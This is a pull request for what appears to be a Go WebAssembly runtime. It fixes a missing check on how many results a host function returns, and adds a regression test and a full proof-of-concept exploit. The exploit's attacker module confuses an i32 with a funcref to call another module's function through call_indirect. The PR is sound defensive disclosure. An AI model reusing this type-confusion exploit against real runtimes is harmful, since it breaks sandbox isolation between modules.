### PR TITLE
Fix host function stack underflow

### DIFF
--- a/epsilon/vm.go
+++ b/epsilon/vm.go
@@ -26,6 +26,7 @@ var (
 	errFuelExhausted            = errors.New("fuel exhausted")
 	errUnknownFunctionType      = errors.New("unknown function type")
 	errIndirectCallTypeMismatch = errors.New("indirect call type mismatch")
+	errHostResultCountMismatch  = errors.New("host func result count mismatch")
 )
 
 const (
@@ -1929,6 +1930,10 @@ func (vm *vm) invokeHostFunction(fun *hostFunction) (err error) {
 
 	args := vm.stack.popValueTypes(fun.GetType().ParamTypes)
 	res := fun.hostCode(fun.module, args...)
+	if len(res) != len(fun.GetType().ResultTypes) {
+		return errHostResultCountMismatch
+	}
+
 	vm.stack.pushAll(res)
 	return err
 }

--- a/epsilon/vm_test.go
+++ b/epsilon/vm_test.go
@@ -819,6 +819,36 @@ func TestFunctionImport(t *testing.T) {
 	}
 }
 
+func TestHostFunctionResultCountMismatch(t *testing.T) {
+	wat := `(module
+		(import "env" "leak" (func $leak (result i32)))
+		(func (export "exploit")
+			call $leak
+			drop
+		)
+	)`
+	imports := map[string]map[string]any{
+		"env": {
+			"leak": func(m *ModuleInstance, args ...any) []any {
+				// Returns nothing, but signature expects i32.
+				// This should fail at runtime due to the result count mismatch.
+				return []any{}
+			},
+		},
+	}
+
+	moduleInstance, err := instantiate(wat, imports, nil)
+	if err != nil {
+		t.Fatalf("failed to create vm: %v", err)
+	}
+
+	_, err = moduleInstance.Invoke("exploit")
+
+	if !errors.Is(err, errHostResultCountMismatch) {
+		t.Fatalf("expected errHostResultCountMismatch, got: %v", err)
+	}
+}
+
 func TestGlobalGet(t *testing.T) {
 	wat := `(module
 		(import "module" "global" (global $g i32))


### PR DESCRIPTION
This PR addresses a critical vulnerability where return values from host functions (functions defined in Go and imported into WASM) are not validated against the function's WebAssembly signature.

### Problem Explanation
If a host function returns fewer values than its signature declares, the VM will still continue execution without pushing the expected values. Subsequent WASM instructions will then pop values from the stack that were pushed *before* the host function call. This leads to a stack underflow from the perspective of the current function, allowing an attacker to bypass the WebAssembly type system. 

For instance, an attacker could push an arbitrary `i32` integer onto the stack, call a flawed host function that expects to return a `funcref` (but returns nothing), and then the VM will incorrectly interpret that `i32` integer as the newly returned `funcref`. This allows unauthorized calling of private functions via `call_indirect`.

The fix ensures we strictly verify that `len(res) == len(fun.GetType().ResultTypes)` in `invokeHostFunction` before pushing any results.

### Full Exploit Proof of Concept
Here is the full exploit demonstrating how an attacker module could invoke a private function by abusing the host function stack underflow:

```go
package host_function_stack_underflow

import (
	"bytes"
	"fmt"
	"testing"

	"github.com/ziggy42/epsilon/epsilon"
	"github.com/ziggy42/epsilon/internal/wabt"
)

func TestHostFunctionStackUnderflow(t *testing.T) {
	// 1. Setup a Victim Module with a private function.
	// This function will occupy store index 0 (as it's the first function added).
	victimWat := `(module
		(func (export "secret") (result i32)
			i32.const 1337)
	)`
	victimWasm, _ := wabt.Wat2Wasm(victimWat)

	runtime := epsilon.NewRuntime()
	victimInstance, err := runtime.InstantiateModuleFromBytes(victimWasm)
	if err != nil {
		t.Fatalf("failed to instantiate victim: %v", err)
	}

	// Verify we can call it normally (exported for verification)
	res, _ := victimInstance.Invoke("secret")
	if res[0].(int32) != 1337 {
		t.Fatalf("unexpected result from victim: %v", res)
	}

	// 2. Setup an Attacker Module.
	// It imports a host function "leak" which claims to return a funcref
	// but actually returns nothing.
	// It uses this to pop an i32 from the stack and treat it as a funcref.

	attackerWat := `(module
		(import "env" "leak" (func $leak (result i32 funcref)))
		(table $t 1 funcref)
		(type $sig (func (result i32)))

		(func (export "exploit") (param $target_idx i32) (result i32)
			i32.const 0          ;; [0]
			local.get $target_idx ;; [0, target_idx]
			call $leak           ;; validator thinks it adds [i32, funcref]
			                     ;; runtime adds NOTHING.
			                     ;; runtime stack is [0, target_idx]

			table.set $t         ;; validator pops funcref then i32. SUCCESS.
			                     ;; runtime pops target_idx as funcref then 0 as index.

			;; Now call it
			i32.const 0
			call_indirect $t (type $sig)
			return               ;; Satisfies validator stack height check
		)
	)`


	attackerWasm, err := wabt.Wat2Wasm(attackerWat)
	if err != nil {
		t.Fatalf("failed to compile attacker WAT: %v", err)
	}

	imports := epsilon.NewModuleImportBuilder("env").
		AddHostFunc("leak", func(m *epsilon.ModuleInstance, args ...any) []any {
			// Vulnerability: returns nothing, despite signature saying it returns funcref
			return []any{}
		}).
		Build()

	attackerInstance, err := runtime.InstantiateModuleWithImports(bytes.NewReader(attackerWasm), imports)
	if err != nil {
		t.Fatalf("failed to instantiate attacker: %v", err)
	}

	// store index 0 is victim's "secret" function.
	res, err = attackerInstance.Invoke("exploit", int32(0))
	if err != nil {
		t.Fatalf("exploit failed: %v", err)
	}

	if res[0].(int32) == 1337 {
		fmt.Println("Exploit Successful! Called private function via store index injection.")
	} else {
		t.Errorf("Exploit failed, got %v", res[0])
	}
}
```
